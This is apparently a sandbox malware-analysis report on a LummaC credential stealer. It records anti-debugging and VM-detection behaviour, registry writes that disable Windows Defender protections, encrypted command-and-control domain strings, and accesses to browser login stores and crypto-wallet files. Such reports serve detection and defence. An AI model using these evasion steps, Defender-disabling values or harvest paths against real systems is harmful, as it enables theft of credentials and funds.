Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E578A second address: 6E5816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jno 00007FDE8CE8B4DDh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FDE8CE8B4CFh 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FDE8CE8B4C8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000003h 0x00000034 sub dword ptr [ebp+122D1D2Eh], esi 0x0000003a push 00000000h 0x0000003c jmp 00007FDE8CE8B4D9h 0x00000041 push 00000003h 0x00000043 mov cx, ax 0x00000046 call 00007FDE8CE8B4C9h 0x0000004b push eax 0x0000004c push edx 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5816 second address: 6E581B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E581B second address: 6E5882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FDE8CE8B4CFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e ja 00007FDE8CE8B4CEh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FDE8CE8B4CFh 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jl 00007FDE8CE8B4CCh 0x00000026 jo 00007FDE8CE8B4C6h 0x0000002c push esi 0x0000002d jmp 00007FDE8CE8B4CEh 0x00000032 pop esi 0x00000033 popad 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a je 00007FDE8CE8B4C8h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 705C1C second address: 705C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6D76EB second address: 6D76F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDE8CE8B4C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 703BF4 second address: 703BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 703E6E second address: 703E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 70411A second address: 704120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 7044B7 second address: 7044E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CEh 0x00000009 popad 0x0000000a jo 00007FDE8CE8B4D5h 0x00000010 jmp 00007FDE8CE8B4CFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 7046B8 second address: 7046CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 7046CA second address: 7046D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDE8CE8B4D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8CEC7B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8CC502 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A7767C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AFD6DF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 55DC12 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 55DD20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 73569E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 712B2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 7A662D instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Memory allocated: 4D70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Memory allocated: 5030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Memory allocated: 4D70000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Code function: 3_2_006E568C rdtsc 3_2_006E568C
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 5976 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe TID: 5712 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1533685372.00000000055DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724441656.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: file.exe, 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Code function: 3_2_006E568C rdtsc 3_2_006E568C
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B0F10 LdrInitializeThunk, 0_2_008B0F10
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
LummaC encrypted strings found
Source: file.exe String found in binary or memory: navygenerayk.store
Source: file.exe String found in binary or memory: scriptyprefej.store
Source: file.exe String found in binary or memory: necklacedmny.store
Source: file.exe String found in binary or memory: founpiuer.store
Source: file.exe String found in binary or memory: fadehairucw.store
Source: file.exe String found in binary or memory: thumbystriw.store
Source: file.exe String found in binary or memory: presticitpo.store
Source: file.exe String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 'TProgram Manager
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867739547.000000000073F000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: ei>Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xtensions/ExodusWeb3nIdWRaXZ40581Z
Source: file.exe, 00000000.00000002.1724441656.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json Jump to behavior
